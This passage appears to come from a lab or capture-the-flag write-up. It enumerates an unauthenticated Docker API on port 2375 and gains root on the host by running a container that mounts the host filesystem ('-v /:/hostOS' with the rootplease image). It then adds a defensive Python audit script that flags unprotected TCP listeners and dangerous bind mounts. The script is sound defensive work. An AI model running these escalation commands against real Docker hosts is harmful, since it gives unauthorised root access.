Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Now that we have found the port on which the Docker API is listening, let's see if we can get some interesting information from it. We can either curl the following endpoint or simply put the same GET request in the browser to see the results.
curl http://<ip address>:2375/images/json
We now get a JSON listing of all the images present on the host:
Now we first test that the alias works, simply by running the following command:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8f4bca8ef241 wordpress:latest "docker-entrypoint.s…" 18 months ago Up 2 hours 0.0.0.0:8000->80/tcp content_wordpress_1
13f0a3bb2706 mysql:5.7 "docker-entrypoint.s…" 18 months ago Up 2 hours 3306/tcp content_db_1
b90babce1037 jeroenpeeters/docker-ssh "npm start" 18 months ago Up 2 hours 22/tcp, 8022/tcp content_ssh_1
Now we want to become root on the Docker host machine. We can achieve this by running a special container.
The command below performs the privilege escalation: it fetches a Docker image from the Docker Hub registry and runs it. The -v parameter passed to Docker specifies a volume to be mounted into the container. The -i and -t parameters put Docker into 'shell mode' (an interactive terminal) rather than starting a daemon process.
The container is set up to mount the root filesystem of the host machine at the container's volume path, so when the container starts it immediately chroots into that volume. This effectively gives you root on the host machine.
There are many, many other ways to achieve this, but this was one of the most straightforward.
dockerx run -v /:/hostOS -i -t chrisfosterelli/rootplease
Unable to find image 'chrisfosterelli/rootplease:latest' locally
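As an added example that is not part of the original write-up, the Python script below shows the two checks a defender would run against the weaknesses this section relies on: a daemon listening on plain TCP (port 2375) without TLS client verification, and containers that bind-mount the host's root filesystem (the `-v /:/hostOS` pattern above) or the daemon socket, or run privileged. The daemon.json dictionaries and container inspect documents are constructed inline so the script runs offline; the container names and IDs are made up. In a real audit, `risky_mounts` would be fed the output of the Engine API's `GET /containers/{id}/json` for each container.

```python
import json

# Host paths whose bind-mount into a container hands over control of the host.
# "/" is the mount used in the write-up; the daemon socket is the other classic case.
HOST_CONTROL_PATHS = frozenset({"/", "/var/run/docker.sock"})


def unauthenticated_tcp_listeners(daemon_config: dict) -> list[str]:
    """Return the tcp:// listeners in a daemon.json-style dict that are not
    protected by TLS client-certificate verification ("tlsverify": true)."""
    if daemon_config.get("tlsverify", False):
        return []
    return [h for h in daemon_config.get("hosts", []) if h.startswith("tcp://")]


def _bind_sources(inspect_doc: dict) -> set[str]:
    """Collect host-side source paths of bind mounts from both places an
    inspect document reports them: HostConfig.Binds (raw -v strings) and Mounts."""
    sources = set()
    host_config = inspect_doc.get("HostConfig") or {}
    for bind in host_config.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if src.startswith("/"):  # named volumes have no leading slash
            sources.add(src)
    for mount in inspect_doc.get("Mounts") or []:
        if mount.get("Type") == "bind":
            sources.add(mount.get("Source", ""))
    return sources


def risky_mounts(inspect_doc: dict) -> list[str]:
    """Findings for one container inspect document: host-control bind mounts
    and privileged mode. An empty list means nothing to report."""
    findings = [f"bind mount of {src}" for src in sorted(_bind_sources(inspect_doc))
                if src in HOST_CONTROL_PATHS]
    if (inspect_doc.get("HostConfig") or {}).get("Privileged"):
        findings.append("privileged container")
    return findings


def audit_containers(inspect_docs: list[dict]) -> dict[str, list[str]]:
    """Map container name -> findings, omitting containers with none."""
    report = {}
    for doc in inspect_docs:
        findings = risky_mounts(doc)
        if findings:
            report[doc.get("Name", doc.get("Id", "?"))] = findings
    return report


# Constructed daemon.json contents: the weak setting from this write-up next to
# a hardened one (TLS on 2376 with client-certificate verification; paths assumed).
WEAK_DAEMON_CONFIG = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_DAEMON_CONFIG = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}

# Constructed inspect documents (IDs and names are made up).
SAMPLE_CONTAINERS = [
    {   # mirrors the escalation container: host root mounted at /hostOS
        "Id": "deadbeef0001", "Name": "/rootplease",
        "HostConfig": {"Binds": ["/:/hostOS"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostOS", "RW": True}],
    },
    {   # benign named volume, as an application container would use
        "Id": "deadbeef0002", "Name": "/content_wordpress_1",
        "HostConfig": {"Binds": [], "Privileged": False},
        "Mounts": [{"Type": "volume", "Name": "wp_data",
                    "Source": "/var/lib/docker/volumes/wp_data/_data",
                    "Destination": "/var/www/html", "RW": True}],
    },
    {   # privileged container that also mounts the daemon socket
        "Id": "deadbeef0003", "Name": "/ci-runner",
        "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"], "Privileged": True},
        "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                    "Destination": "/var/run/docker.sock", "RW": True}],
    },
]

if __name__ == "__main__":
    print("weak daemon listeners:", unauthenticated_tcp_listeners(WEAK_DAEMON_CONFIG))
    print("hardened daemon listeners:", unauthenticated_tcp_listeners(HARDENED_DAEMON_CONFIG))
    print(json.dumps(audit_containers(SAMPLE_CONTAINERS), indent=2))
```

The listener check is deliberately strict: any `tcp://` host without `tlsverify` is reported, because without client certificates the API is as open as it was in this write-up regardless of the bind address. The mount check reads both `HostConfig.Binds` and `Mounts` since the two are populated differently depending on how the container was created.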